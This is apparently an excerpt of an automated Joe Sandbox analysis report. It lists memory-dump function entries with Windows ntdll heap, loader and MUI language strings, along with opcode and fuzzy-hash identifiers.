                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 3446177414-1700792311
                                                                          • Opcode ID: d4d73ee9b5703aa9229dceac47f8fd35b375f5e33e049f7afe91fc6bc87b40ab
                                                                          • Instruction ID: c621e516cbd741c4e07e945a692ca848b16b59ea3b5f9bff0547afa0fd590a18
                                                                          • Opcode Fuzzy Hash: d4d73ee9b5703aa9229dceac47f8fd35b375f5e33e049f7afe91fc6bc87b40ab
                                                                          • Instruction Fuzzy Hash: 3BD1FF39A24685DFCB15CFA8D404AE9FBF2FF4A360F048459E445AF221DB71A942CB24

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.p5
                                                                          • API String ID: 0-657615941
                                                                          • Opcode ID: 4a02a0592f44186696efa064075a7d70176f0b77935c5732206f7f70aeb289ec
                                                                          • Instruction ID: f20f3f5ed8057a8970cd2070ac6854b4b89d15954ea9ce9753ae15ca9e425395
                                                                          • Opcode Fuzzy Hash: 4a02a0592f44186696efa064075a7d70176f0b77935c5732206f7f70aeb289ec
                                                                          • Instruction Fuzzy Hash: 84B19BB2909341DFD721DF24C441A5FBBF9BB88794F42492EF8899B241DB70D948CB92

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                          • API String ID: 3446177414-1745908468
                                                                          • Opcode ID: 0000288d464c31567b8ea0075f3edcfc82e4742b389ae4674e487ec4c92d8f60
                                                                          • Instruction ID: d86fc6f4cc456d4f5eb87d294030e7514201211f3ed20ea05ef1c21fcec96500
                                                                          • Opcode Fuzzy Hash: 0000288d464c31567b8ea0075f3edcfc82e4742b389ae4674e487ec4c92d8f60
                                                                          • Instruction Fuzzy Hash: FE911C39A05684DFDB01CFA8C846A9DFBF2FF49360F04845AE441AF651CB76A942CF14
                                                                          Strings
                                                                          • @, xrefs: 356DD09D
                                                                          • @, xrefs: 356DD24F
                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 356DD06F
                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 356DD0E6
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 356DD263
                                                                          • @, xrefs: 356DD2B3
                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 356DD202
                                                                          • h.p5, xrefs: 3573A5D2
                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 356DD136
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.p5
                                                                          • API String ID: 0-4002567227
                                                                          • Opcode ID: 575f8af787017957b6d3f94906d46539a855fb1cb2ad7be62b447a2725c5e5d9
                                                                          • Instruction ID: 5b1b9f7f5a09208ce7069f6b5157de482c658ce4dfc36de3e66c3cd90aae8522
                                                                          • Opcode Fuzzy Hash: 575f8af787017957b6d3f94906d46539a855fb1cb2ad7be62b447a2725c5e5d9
                                                                          • Instruction Fuzzy Hash: 00A138B1908305DFE721DF21C885B9BB7F8BB84765F01492EE9989A241DB74D908CB93
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 3570D879
                                                                            • Part of subcall function 356E4779: RtlDebugPrintTimes.NTDLL ref: 356E4817
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-1975516107
                                                                          • Opcode ID: 20826f66e9c27ead3051e6c4e4e5ec5eb743d76584ea3c6f7f6b536dcfb24aed
                                                                          • Instruction ID: 1182a1a6019ac64be9d1c7a6e6f91980643b619b385e6ecd8f79c4a1c940b6be
                                                                          • Opcode Fuzzy Hash: 20826f66e9c27ead3051e6c4e4e5ec5eb743d76584ea3c6f7f6b536dcfb24aed
                                                                          • Instruction Fuzzy Hash: 0251AC75E043459FDB14CFA4C9847AEBBF2BF44324F624059D801AB281DBB1A986CFD0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                          • API String ID: 0-2224505338
                                                                          • Opcode ID: 313d9fd4eb2a7319509f538dc1c317e7afb7fbb0716f93e4afede8ec2698e203
                                                                          • Instruction ID: 0ad28b12c0df2051633efcd44028277447a266f9b076b80b7acca02b4d21a665
                                                                          • Opcode Fuzzy Hash: 313d9fd4eb2a7319509f538dc1c317e7afb7fbb0716f93e4afede8ec2698e203
                                                                          • Instruction Fuzzy Hash: 72511E36212284EFDB11CFA5C895F5AB3F9EB097B0F1588A9F4029F221CA71D941CF14
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                          • API String ID: 0-523794902
                                                                          • Opcode ID: 5fab144bf527cc462a8e4c1be4522590fa8ea5868253771445770c55fee9faed
                                                                          • Instruction ID: 91504087a887df4cfbb77fde00777d64ad8c38160b64b00be0b2abe51a043d29
                                                                          • Opcode Fuzzy Hash: 5fab144bf527cc462a8e4c1be4522590fa8ea5868253771445770c55fee9faed
                                                                          • Instruction Fuzzy Hash: EE420D756193819FD305CF28C894A2AFBFAFF88394F05496DE8858B352DB70D845CB92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.p5
                                                                          • API String ID: 0-4288392243
                                                                          • Opcode ID: 467506d4e4d9b8848eb7e0eaf40c7cdb8cf7e3bbd0da19f9222f0e4ad168409a
                                                                          • Instruction ID: 1e16046e5768713df5d26162f2a549357731990f0a5b7caff322b20d54f8cdd9
                                                                          • Opcode Fuzzy Hash: 467506d4e4d9b8848eb7e0eaf40c7cdb8cf7e3bbd0da19f9222f0e4ad168409a
                                                                          • Instruction Fuzzy Hash: 18F12AB6E04219EFDB11CF99C994EDEBBF9BF48690F51405AE505AB210E7B09E01CF90
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                          • API String ID: 0-122214566
                                                                          • Opcode ID: e24f86630415962f4e7aeef01cf7e0d9fc160b9b5e1e1656ca2aa1db4c6588e1
                                                                          • Instruction ID: 7e919973fd76cb35e2d50c0396b0066698f12e635bb634625bf55f15aeddef22
                                                                          • Opcode Fuzzy Hash: e24f86630415962f4e7aeef01cf7e0d9fc160b9b5e1e1656ca2aa1db4c6588e1
                                                                          • Instruction Fuzzy Hash: 9FC115B5F08319ABEB15CB64C890BBE77B2BF45350F54416DE802AF2A0DBB6D944C391
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 3446177414-2283098728
                                                                          • Opcode ID: 25f0102bb2295b9ba8bc7d6cd50c36aab4cb07e9155b16a6ef409ec196276413
                                                                          • Instruction ID: 9a46a0c64211865438a28674aae02cf18c5c5079b75bb3bb82a79a01751a6292
                                                                          • Opcode Fuzzy Hash: 25f0102bb2295b9ba8bc7d6cd50c36aab4cb07e9155b16a6ef409ec196276413
                                                                          • Instruction Fuzzy Hash: 8251C076B043019FE710EF38C884A2AB7F2BB84324F15066DE4929F691DB71A845CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                          • API String ID: 0-3061284088
                                                                          • Opcode ID: cac2ff36543496a3220d5ffc852b2533d30824331f70030548a441e108fb4634
                                                                          • Instruction ID: 40b0906fc52c0c2716f2d90ae744143748c8ce2cf4b2fe7d8692ce7217f130e5
                                                                          • Opcode Fuzzy Hash: cac2ff36543496a3220d5ffc852b2533d30824331f70030548a441e108fb4634
                                                                          • Instruction Fuzzy Hash: 2001703712A2D0AED715C329E40BF86F7F8EB42770F19489EE4044FAA5DEE59840DA94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $$.mui$.mun$SystemResources\
                                                                          • API String ID: 0-3047833772
                                                                          • Opcode ID: da19ae6af59379d156702dd614f0b14f13999208a47c6c2ddaca0766c41a06ee
                                                                          • Instruction ID: 6a5f5e485fbc7646edd31d04392b724888d8e7accd85d35b08db0b7801fd0172
                                                                          • Opcode Fuzzy Hash: da19ae6af59379d156702dd614f0b14f13999208a47c6c2ddaca0766c41a06ee
                                                                          • Instruction Fuzzy Hash: 02625B72B023298FEB21CF54CD44BD9B7B9BB0A350F4441EAE409A7A50DB719E85CF52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                          • API String ID: 0-3178619729
                                                                          • Opcode ID: 9f18045a4edc127cde1b7b0a372d8ddd99c304c9d27dd724efc0b6c9162e2f59
                                                                          • Instruction ID: e007bd944bcdf08dbc4e9184a751c20ebc52ad42d912d4404db5144a49f122a5
                                                                          • Opcode Fuzzy Hash: 9f18045a4edc127cde1b7b0a372d8ddd99c304c9d27dd724efc0b6c9162e2f59
                                                                          • Instruction Fuzzy Hash: C5E2D074E08255CFEB14CF68C890BA9BBF1FF48305F148199E849ABB85D776A841CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LUk5$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                          • API String ID: 0-985150174
                                                                          • Opcode ID: c1fd4a9114506a4ae686c873596a191b4613602348c2529a2d0b7edae371b114
                                                                          • Instruction ID: 23f91da9649d8787f5cbfad6c89fd1dea4a994ee18925c8b592f1f14e45cf2f2
                                                                          • Opcode Fuzzy Hash: c1fd4a9114506a4ae686c873596a191b4613602348c2529a2d0b7edae371b114
                                                                          • Instruction Fuzzy Hash: 41B1ACB5A067068BDB15CF64CA90B9DB3B6BF45744F60442DE866EB7A0D770D980CF01
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}l5
                                                                          • API String ID: 0-935925950
                                                                          • Opcode ID: 074bbf93b411f65ef156f1396887afd09f3c6d984e8924b35befe6be7a4c7353
                                                                          • Instruction ID: f64bad21fb635c8214330e8533dd2b91c658a57fe5c6c4d5a7241faafbdf0a9c
                                                                          • Opcode Fuzzy Hash: 074bbf93b411f65ef156f1396887afd09f3c6d984e8924b35befe6be7a4c7353
                                                                          • Instruction Fuzzy Hash: 0E819DB5608340AFEB21CB29D844B7AB7E9FF84754F40092DF9859F290DB75D900CB62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LUk5$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                          • API String ID: 0-1793154059
                                                                          • Opcode ID: dddf001de8ee67a1ff9b2cfe957fa8b6daadc744a0a78c9f1a39ff01ec840353
                                                                          • Instruction ID: be2a35b9308c6b45c2888c0d82f1730277ee7b9561acf0b6c3ed5ce670775453
                                                                          • Opcode Fuzzy Hash: dddf001de8ee67a1ff9b2cfe957fa8b6daadc744a0a78c9f1a39ff01ec840353
                                                                          • Instruction Fuzzy Hash: BA91DFB5A0B349CBEB11CF54C640BADB3B1FF00364F644199E815AF2A0D7789A81CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                          • API String ID: 0-2586055223
                                                                          • Opcode ID: f47c7c4fa0e7e5b5289c4c53ac9265c0fada7fd60e83efa9e2966e37caa5871e
                                                                          • Instruction ID: a00c742c72af8e0a1ecf3887c7cd515d62364c82f432c53fafc55f60954cac99
                                                                          • Opcode Fuzzy Hash: f47c7c4fa0e7e5b5289c4c53ac9265c0fada7fd60e83efa9e2966e37caa5871e
                                                                          • Instruction Fuzzy Hash: E1610176215780AFE311CB64C855F57F7EAFB807A0F050859F9548F692DB74E840CBA2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit$l/t5
                                                                          • API String ID: 0-198358361
                                                                          • Opcode ID: 65ea977f467797e228bac1f544041df53331b06e001a37b505f596eb52f6b730
                                                                          • Instruction ID: 4884fe1de447535825a4a4dd6b4a9a149fbe4cbd56a3a068029e387803914321
                                                                          • Opcode Fuzzy Hash: 65ea977f467797e228bac1f544041df53331b06e001a37b505f596eb52f6b730
                                                                          • Instruction Fuzzy Hash: 8441C472A05764CBEF12CB94E854BADB7B9FF45744F20009AD811EF391DBB59A01CB11
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                          • API String ID: 0-1391187441
                                                                          • Opcode ID: 915c6b8dca4a3a6faa484195890c385b53cf80d9ae531fd93981f90378636b23
                                                                          • Instruction ID: 41c4d4b755b7f965d83b52fd0aaf520c4c18d5b206e055cecd16614ef8b0fe44
                                                                          • Opcode Fuzzy Hash: 915c6b8dca4a3a6faa484195890c385b53cf80d9ae531fd93981f90378636b23
                                                                          • Instruction Fuzzy Hash: 8D31D236A01208EFDB11CB55CC89FDAB7F9FB457B0F1544A5E819AB291D770E940CEA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eq5
                                                                          • API String ID: 0-2187334716
                                                                          • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                          • Instruction ID: 9df73b03138a0b8c91321d071ad82c17974f4a47d47773cee8dcd985bb381cad
                                                                          • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                          • Instruction Fuzzy Hash: A8316171A00659BFDB11CB95CC44EAEBBB9FB84750F004025F915AB260DB31DA05DBA0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                          • API String ID: 0-1880532218
                                                                          • Opcode ID: 928f8668d238f82b0c975bc637d9f586b505dee0a417d58e95142733f6ade14c
                                                                          • Instruction ID: 4a8fffb2914a151d3f8ca74066db3b73ebb71411208f872f5e6c7d4cf52178f4
                                                                          • Opcode Fuzzy Hash: 928f8668d238f82b0c975bc637d9f586b505dee0a417d58e95142733f6ade14c
                                                                          • Instruction Fuzzy Hash: 0A21217AE01280AFD701CB58D955A9AB3F6FF45748F0941A9EC85AB341EB34D906C741
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID:
                                                                          • API String ID: 3446177414-0
                                                                          • Opcode ID: 5d4e5470838487219e80abcc609b7c2a1a2f8fed4794a4c915e0a1490a361b8b
                                                                          • Instruction ID: 499153d1e686b3d3d0d9729feaa60373881d4bae6dd4bd5c23587194f7baf8c8
                                                                          • Opcode Fuzzy Hash: 5d4e5470838487219e80abcc609b7c2a1a2f8fed4794a4c915e0a1490a361b8b
                                                                          • Instruction Fuzzy Hash: 935124B4A02785EFEB06EF65C944BADF7B2FF44365F10412AE4129B290DBB4D911CB81
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmp
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                          • API String ID: 0-1168191160
                                                                          • Opcode ID: 8e4cf9530d27e5c2bd2a486ee743937ad709ad2ff60c56eb9f9c5614944de7f8
                                                                          • Instruction ID: 7b145289a46587496a7508b5daab8e70e837ccabd7905c5ea48f42e0b50028ac
                                                                          • Opcode Fuzzy Hash: 8e4cf9530d27e5c2bd2a486ee743937ad709ad2ff60c56eb9f9c5614944de7f8
                                                                          • Instruction Fuzzy Hash: 76F191B5A042288BDF21CF14DC84BE9B3B6FF44744F5440E9D609AB241EB719E85CF99
                                                                          Strings
                                                                          • HEAP: , xrefs: 356E14B6
                                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 356E1648
                                                                          • HEAP[%wZ]: , xrefs: 356E1632
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
